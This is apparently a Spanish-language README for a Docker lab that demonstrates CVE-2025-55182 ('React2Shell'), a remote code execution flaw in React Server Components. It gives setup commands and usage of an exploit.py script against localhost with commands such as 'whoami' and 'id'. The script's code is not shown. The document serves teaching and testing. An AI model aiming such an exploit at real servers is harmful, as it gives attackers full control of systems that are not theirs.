
Un laboratorio práctico para entender y explotar CVE-2025-55182 (React2Shell) - Ejecución remota de código en React Server Components
Un laboratorio práctico para explotar CVE-2025-55182 (React2Shell) - Ejecución remota de código en React Server Components.
Solo con fines educativos. Prueba únicamente en sistemas que te pertenezcan.
# Clonar e iniciar
git clone https://github.com/dhananjayakumarn/CVE-2025-55182-Lab.git
cd CVE-2025-55182-Lab
docker-compose up -d
# Espera 20 segundos, luego explota
python3 exploit.py http://localhost:3000 "whoami"
¡Eso es todo! Deberías ver la salida del comando que demuestra RCE.
Vulnerabilidad crítica de RCE en React Server Components (CVSS 10.0).
Afectados:
Impacto: Una solicitud HTTP = Control total del servidor
python3 exploit.py <target> <command>
# Ejemplos
python3 exploit.py http://localhost:3000 "whoami"
python3 exploit.py http://localhost:3000 "id"
python3 exploit.py http://localhost:3000 "ls -la"
docker-compose down
⭐ ¡Dale estrella si te ayudó a aprender!